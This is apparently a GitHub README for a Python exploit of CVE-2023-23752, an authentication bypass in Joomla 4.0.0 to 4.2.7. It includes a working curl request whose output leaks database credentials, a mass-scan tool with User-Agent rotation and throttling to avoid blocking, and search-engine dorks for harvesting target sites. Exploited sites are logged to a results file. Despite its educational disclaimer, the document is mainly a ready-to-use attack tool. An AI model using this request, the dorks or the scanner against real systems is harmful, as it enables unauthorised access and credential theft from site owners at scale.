Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).
As discussed, CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
* Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
In the proof of concept above, the server responds with the credentials root:labpass1, which are the credentials for our test Joomla! MySQL account. But it’s important to know that our test MySQL server was bound to 127.0.0.1, so the remote attacker can’t access the server, making the credentials mostly useless. Binding MySQL to the localhost should be the most common configuration, which severely limits this credential leak.
This Exploit and Proof of Concept (PoC) is presented solely for educational and informational purposes. The intent behind sharing this is to demonstrate potential vulnerabilities in a controlled environment. The goal is to promote understanding of cybersecurity concepts and encourage responsible disclosure.
- Ethical Use: This Exploit and PoC should only be used in environments and systems where you have explicit authorization. Unauthorized access to computer systems is illegal and unethical.
- Responsible Disclosure: If you discover vulnerabilities as a result of this Exploit and PoC, it is strongly recommended to report them responsibly to the relevant parties, allowing them adequate time to address and mitigate the issues.
- No Endorsement: This PoC and related materials do not endorse or encourage any form of unauthorized access, hacking, or any other illegal activities.
By accessing and using this Exploit and PoC, you acknowledge that you are solely responsible for your actions and agree to use this information in compliance with applicable laws and regulations. The author assumes no liability for any misuse or consequences arising from the use of this PoC for any purpose other than education and responsible disclosure.
- SINGLE SCAN: Scanning a single site for Exploit.
- MASS SCAN: Scanning list of site from a file for Exploit.
- ASYNCHRONOUS Threading: Using Threads for fast processing.
- DYNAMIC THROTTLING: Implement a dynamic request throttling technique to avoid sending too many requests quickly, which can assist avoid getting blocked.
- RESULT SUMMARISATION: Summarise the findings at the conclusion of the scan, giving data on successful scans, unsuccessful scans, and any problems that were detected.
- INPUT VALIDATION: Implement input validation to make sure that user inputs, particularly those from files, are correctly structured and contain legitimate URLs.
- USER-AGENT ROTATION: Rotate the User-Agent header for each request to mimic different browsers and reduce the chance of being blocked.
- Python 3.x
- Required Python packages:
requests
,colorama
,urllib3
,fake_useragent
,aio-http
-
Clone the repository:
git clone https://github.com/Pushkarup/CVE-2023-23752.git cd CVE-2023-23752
-
Install the required Python packages:
pip install -r requirements.txt
- Create a text file containing the target sites (one per line) and save it with a
.txt
extension.
- Collect site list for test using dork
inurl:/api/index.php/v1/config/application?public=true
,intitle:"Index of" /api/index.php/v1/config/application?public=true
,filetype:php inurl:/api/index.php/v1/config/application?public=true
,intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"
-
Run the script:
python joomla.py
-
Let the script run its course and follow the directions.
-
Every site that has been exploited will be stored to Results.txt.
Contributions are welcome! If you find any issues or have improvements, feel free to open a pull request or create an issue.
This project is licensed under the MIT License.
- GitHub: Pushkar Upadhyay
- LinkedIn: Pushkar Upadhyay
- BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
- ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
- USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a